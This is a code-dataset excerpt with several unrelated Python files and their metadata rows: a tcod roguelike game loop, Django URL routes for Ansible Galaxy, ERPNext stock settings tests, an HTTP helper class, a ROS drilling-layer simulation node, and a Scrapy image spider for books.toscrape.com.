screen_width = 80
screen_height = 50
map_width = 80
map_height = 45

room_max_size = 10
room_min_size = 6
max_rooms = 30

fov_algorithm = 0
fov_light_walls = False
fov_radius = 10

max_monsters_per_room = 3

colors = {
    'dark_wall': tcod.Color(0, 0, 0),
    'light_wall': tcod.Color(120, 120, 80),
    'dark_ground': tcod.Color(150, 150, 150),
    'light_ground': tcod.Color(200, 200, 150)
}

def main():
    """ Main game function """
    fighter_component = Fighter(hp=30, defense=2, power=5)
    player = Entity(0, 0, '@', tcod.white, 'Player', blocks=True,
                    render_order=RenderOrder.ACTOR, fighter=fighter_component)
    entities = [player]

    # Import font
    tcod.console_set_custom_font(FONT, tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD)

    # Console initialization
    tcod.console_init_root(screen_width, screen_height, 'Pilferer %s' % VERSION, False, vsync=False)
    con = tcod.console.Console(screen_width, screen_height)

    # Mapping
    game_map = GameMap(map_width, map_height)
    game_map.make_map(max_rooms, room_min_size, room_max_size, map_width,
                      map_height, player, entities, max_monsters_per_room)

    # FOV
    fov_recompute = True
    fov_map = initialize_fov(game_map)

    # Variables for holding input
    key = tcod.Key()
    mouse = tcod.Mouse()

    # Game state
    game_state = GameStates.PLAYERS_TURN

    # Main game loop
    while not tcod.console_is_window_closed():
        # FOV
        if fov_recompute:
            recompute_fov(fov_map, player.x, player.y, fov_radius, fov_light_walls, fov_algorithm)

        # Draw
        render_all(con, entities, player, game_map, fov_map, fov_recompute, screen_width, screen_height, colors)
        fov_recompute = False
        tcod.console_flush()
        clear_all(con, entities)

        # INPUT HANDLING
        tcod.sys_check_for_event(tcod.EVENT_KEY_PRESS, key, mouse)
        action = handle_keys(key)

        # Command move
        player_turn_results = []
        move = action.get('move')
        if move and game_state == GameStates.PLAYERS_TURN:
            dx, dy = move
            destination_x = player.x + dx
            destination_y = player.y + dy
            if not game_map.is_blocked(destination_x, destination_y):
                target = get_blocking_entity_at_location(entities, destination_x, destination_y)
                if target:
                    attack_results = player.fighter.attack(target)
                    player_turn_results.extend(attack_results)
                else:
                    player.move(dx, dy)
                    fov_recompute = True
                game_state = GameStates.ENEMY_TURN

        # Command exit
        exit = action.get('exit')
        if exit:
            return True

        # Command Fullscreen
        fullscreen = action.get('fullscreen')
        if fullscreen:
            tcod.console_set_fullscreen(not tcod.console_is_fullscreen())

        # Results
        for player_turn_result in player_turn_results:
            message = player_turn_result.get('message')
            dead_entity = player_turn_result.get('dead')
            if message:
                print(message)
            if dead_entity:
                if dead_entity == player:
                    message, game_state = kill_player(dead_entity)
                else:
                    message = kill_monster(dead_entity)
                print(message)

        # Monster turns
        if game_state == GameStates.ENEMY_TURN:
            for entity in entities:
                if entity.ai:
                    enemy_turn_results = entity.ai.take_turn(player, fov_map, game_map, entities)
                    for enemy_turn_result in enemy_turn_results:
                        message = enemy_turn_result.get('message')
                        dead_entity = enemy_turn_result.get('dead')
                        if message:
                            print(message)
                        if dead_entity:
                            if dead_entity == player:
                                message, game_state = kill_player(dead_entity)
                            else:
                                message = kill_monster(dead_entity)
                            print(message)
                        if game_state == GameStates.PLAYER_DEAD:
                            break
                    if game_state == GameStates.PLAYER_DEAD:
                        break
            else:
                game_state = GameStates.PLAYERS_TURN

if __name__ == '__main__':
    main()
| 32.335443
| 112
| 0.603249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.078293
|
42a6cbc1a232b14997c3952e709da0eebe84cd51
| 2,337
|
py
|
Python
|
galaxy/api/v2/urls.py
|
SamyCoenen/galaxy
|
7c17ef45e53b0fc2fe8a2c70a99f3947604e0b0e
|
[
"Apache-2.0"
] | null | null | null |
galaxy/api/v2/urls.py
|
SamyCoenen/galaxy
|
7c17ef45e53b0fc2fe8a2c70a99f3947604e0b0e
|
[
"Apache-2.0"
] | null | null | null |
galaxy/api/v2/urls.py
|
SamyCoenen/galaxy
|
7c17ef45e53b0fc2fe8a2c70a99f3947604e0b0e
|
[
"Apache-2.0"
] | null | null | null |
# (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.

from django.urls import path

from galaxy.api.v2 import views

app_name = 'api'

urlpatterns = [
    # Collection Imports URLs
    path('collection-imports/<int:pk>/',
         views.CollectionImportView.as_view(),
         name='collection-import-detail'),

    # Collection Version list URLs
    path('collections/<int:pk>/versions/',
         views.VersionListView.as_view(),
         name='version-list'),
    path('collections/<str:namespace>/<str:name>/versions/',
         views.VersionListView.as_view(),
         name='version-list'),

    # Collection Version detail URLs
    path('collection-versions/<int:version_pk>/',
         views.VersionDetailView.as_view(),
         name='version-detail'),
    path('collections/<str:namespace>/<str:name>/versions/<str:version>/',
         views.VersionDetailView.as_view(),
         name='version-detail'),

    # Collection Version Artifact download URLs
    path('collection-versions/<int:pk>/artifact/',
         views.CollectionArtifactView.as_view(),
         name='version-artifact'),
    path('collections/<namespace>/<name>/versions/<version>/artifact/',
         views.CollectionArtifactView.as_view(),
         name='version-artifact'),

    # Collection URLs
    path('collections/',
         views.CollectionListView.as_view(),
         name='collection-list'),
    path('collections/<int:pk>/',
         views.CollectionDetailView.as_view(),
         name='collection-detail'),
    # NOTE: needs to come after 'collections/<int:collection_pk>/versions/'
    path('collections/<str:namespace>/<str:name>/',
         views.CollectionDetailView.as_view(),
         name='collection-detail'),
]
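
With `app_name = 'api'` these routes reverse under the `api:` namespace, and same-named patterns are disambiguated by which keyword arguments you supply. A sketch (the namespace/name values are placeholders, and the URL prefix depends on where this URLconf is included):

from django.urls import reverse

url_by_pk = reverse('api:version-detail', kwargs={'version_pk': 42})
url_by_name = reverse('api:version-detail', kwargs={
    'namespace': 'myns', 'name': 'mycollection', 'version': '1.0.0',
})
print(url_by_pk)    # .../collection-versions/42/
print(url_by_name)  # .../collections/myns/mycollection/versions/1.0.0/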
| 35.953846
| 75
| 0.682071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,457
| 0.623449
|
42a78f723d388f6c17abd15949a96f2a870ca42a
| 1,933
|
py
|
Python
|
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | null | null | null |
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals

import frappe
import unittest

class TestStockSettings(unittest.TestCase):
    def setUp(self):
        frappe.db.set_value("Stock Settings", None, "clean_description_html", 0)

    def test_settings(self):
        item = frappe.get_doc(dict(
            doctype = 'Item',
            item_code = 'Item for description test',
            item_group = 'Products',
            description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
        )).insert()

        settings = frappe.get_single('Stock Settings')
        settings.clean_description_html = 1
        settings.save()

        item.reload()
        self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')

        item.delete()

    def test_clean_html(self):
        settings = frappe.get_single('Stock Settings')
        settings.clean_description_html = 1
        settings.save()

        item = frappe.get_doc(dict(
            doctype = 'Item',
            item_code = 'Item for description test',
            item_group = 'Products',
            description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
        )).insert()

        self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')

        item.delete()
| 42.021739
| 338
| 0.698914
| 1,749
| 0.904811
| 0
| 0
| 0
| 0
| 0
| 0
| 1,170
| 0.605277
|
42a96ad3b83164695c47573ef1f876f36eb4d891
| 1,148
|
py
|
Python
|
pybloxy/classes/http.py
|
R0bl0x10501050/roblox.py
|
cbbb25878627c2d837caaeb7edf37d0aeda615ae
|
[
"MIT"
] | null | null | null |
pybloxy/classes/http.py
|
R0bl0x10501050/roblox.py
|
cbbb25878627c2d837caaeb7edf37d0aeda615ae
|
[
"MIT"
] | null | null | null |
pybloxy/classes/http.py
|
R0bl0x10501050/roblox.py
|
cbbb25878627c2d837caaeb7edf37d0aeda615ae
|
[
"MIT"
] | null | null | null |
import logging

import requests

class Http:
    # These helpers never use instance state, so they are plain static methods.
    # On a non-200 status they log an error and return None (logging.error
    # has no return value); callers should check for None.
    @staticmethod
    def sendRequest(url):
        payload = requests.get(str(url))
        statusCode = payload.status_code
        content = payload.content
        if statusCode != 200:
            return logging.error(f"[Pybloxy - GET] Something went wrong! Error Code: {statusCode}")
        return content

    @staticmethod
    def postRequest(url, payload):
        payload = requests.post(str(url), data=payload)
        statusCode = payload.status_code
        content = payload.content
        if statusCode != 200:
            return logging.error(f"[Pybloxy - POST] Something went wrong! Error Code: {statusCode}")
        return content

    @staticmethod
    def patchRequest(url, payload):
        payload = requests.patch(str(url), data=payload)
        statusCode = payload.status_code
        content = payload.content
        if statusCode != 200:
            return logging.error(f"[Pybloxy - PATCH] Something went wrong! Error Code: {statusCode}")
        return content

    @staticmethod
    def deleteRequest(url, payload):
        # The original accepted `payload` but silently dropped it; pass it
        # through for consistency with the other write methods.
        payload = requests.delete(str(url), data=payload)
        statusCode = payload.status_code
        content = payload.content
        if statusCode != 200:
            return logging.error(f"[Pybloxy - DELETE] Something went wrong! Error Code: {statusCode}")
        return content
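
A quick usage sketch (the endpoint below is a placeholder; any API that answers 200 behaves the same way):

body = Http.sendRequest("https://users.roblox.com/v1/users/1")  # hypothetical endpoint
if body is not None:
    print(body[:80])  # raw bytes of the response body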
| 26.697674
| 93
| 0.722997
| 1,116
| 0.972125
| 0
| 0
| 0
| 0
| 0
| 0
| 266
| 0.231707
|
42a99e600220ea6f0c20b482db83263664318f69
| 1,305
|
py
|
Python
|
resources/nuice_simulations/src/layers_sim/layers_sim_node.py
|
SpyGuyIan/NUice
|
47991a848dac244b4c476b4a92f7a27a1f9e5dcc
|
[
"MIT"
] | 1
|
2021-08-17T00:40:42.000Z
|
2021-08-17T00:40:42.000Z
|
resources/nuice_simulations/src/layers_sim/layers_sim_node.py
|
SpyGuyIan/NUice
|
47991a848dac244b4c476b4a92f7a27a1f9e5dcc
|
[
"MIT"
] | 1
|
2021-01-31T17:15:40.000Z
|
2021-01-31T17:15:40.000Z
|
resources/nuice_simulations/src/layers_sim/layers_sim_node.py
|
NUMarsIce/NUice
|
47991a848dac244b4c476b4a92f7a27a1f9e5dcc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
from std_msgs.msg import Float64
import random

possibleLayers = [140, 50, 80, 200, 100]
cur_position = 0.0

def position_callback(msg):
    global cur_position
    cur_position = msg.data

# Build the layers simulation, then publish material strengths. Lasts 100 seconds.
def runLayersSim():
    numLayers = random.randint(10, 20)  # unused in the current implementation
    # Start at 0 so the layers list covers positions 0..999; combined with
    # range(size) in setNextLayer this yields exactly 1000 entries, avoiding
    # an IndexError when cur_position approaches 1000.
    a = 0
    layers = []
    while (a < 1000):
        size = random.randint(a + 1, 1000) - a
        strength = getNextLayerStrength()
        setNextLayer(size, strength, layers)
        a = a + size
    pub = rospy.Publisher('material_strength', Float64, queue_size=10)
    rospy.init_node('layers_node', anonymous=True)
    rate = rospy.Rate(10)
    rospy.Subscriber("/drill_motor/cur_position", Float64, position_callback)
    while ((not rospy.is_shutdown()) and cur_position < 1000):
        pub.publish(layers[int(cur_position)])
        rate.sleep()

# Get the strength of the next layer from the list of possible layer strengths.
def getNextLayerStrength():
    l = random.randint(0, len(possibleLayers) - 1)
    return possibleLayers[l]

# Build the next layer of the simulation.
def setNextLayer(size, strength, layers):
    # range(size), not range(1, size): the latter appends one entry too few
    # per layer, leaving the list short of the drill's position range.
    for i in range(size):
        layers.append(strength)

if __name__ == '__main__':
    runLayersSim()
| 29
| 81
| 0.691954
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.221456
|
42a9a106ced30891f6bde30e0be69f4978578110
| 1,121
|
py
|
Python
|
imagescraper/imagescraper/spiders/image_crawl_spider.py
|
karthikn2789/Scrapy-Projects
|
84db4ed1a2f38d6fa03d1bfa6a6ebf9fb527f523
|
[
"MIT"
] | 2
|
2021-04-08T12:48:10.000Z
|
2021-06-16T09:42:39.000Z
|
imagescraper/imagescraper/spiders/image_crawl_spider.py
|
karthikn2789/Scrapy-Projects
|
84db4ed1a2f38d6fa03d1bfa6a6ebf9fb527f523
|
[
"MIT"
] | null | null | null |
imagescraper/imagescraper/spiders/image_crawl_spider.py
|
karthikn2789/Scrapy-Projects
|
84db4ed1a2f38d6fa03d1bfa6a6ebf9fb527f523
|
[
"MIT"
] | 6
|
2020-08-05T09:45:39.000Z
|
2021-11-16T14:05:20.000Z
|
import scrapy
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule

from ..items import ImagescraperItem

class ImageCrawlSpiderSpider(CrawlSpider):
    name = "image_crawl_spider"
    allowed_domains = ["books.toscrape.com"]

    def start_requests(self):
        url = "http://books.toscrape.com/"
        yield scrapy.Request(url=url)

    rules = (Rule(LinkExtractor(allow=r"catalogue/"), callback="parse_image", follow=True),)

    def parse_image(self, response):
        if response.xpath('//div[@class="item active"]/img').get() is not None:
            img = response.xpath('//div[@class="item active"]/img/@src').get()
            """
            Computing the Absolute path of the image file.
            "image_urls" require absolute path, not relative path
            """
            m = re.match(r"^(?:../../)(.*)$", img).group(1)
            url = "http://books.toscrape.com/"
            img_url = "".join([url, m])
            image = ImagescraperItem()
            image["image_urls"] = [img_url]  # "image_urls" must be a list
            yield image
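
For `image_urls` to trigger actual downloads, the project also needs an item with the conventional fields and the images pipeline enabled. A sketch of what `items.py` and `settings.py` presumably contain (those files are not shown here, so treat the exact contents as assumptions):

# items.py (assumed)
import scrapy

class ImagescraperItem(scrapy.Item):
    image_urls = scrapy.Field()  # consumed by Scrapy's ImagesPipeline
    images = scrapy.Field()      # filled in with download results

# settings.py (assumed)
ITEM_PIPELINES = {"scrapy.pipelines.images.ImagesPipeline": 1}
IMAGES_STORE = "downloaded_images"  # local directory for the image files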
| 36.16129
| 92
| 0.611954
| 964
| 0.859946
| 739
| 0.659233
| 0
| 0
| 0
| 0
| 399
| 0.355932
|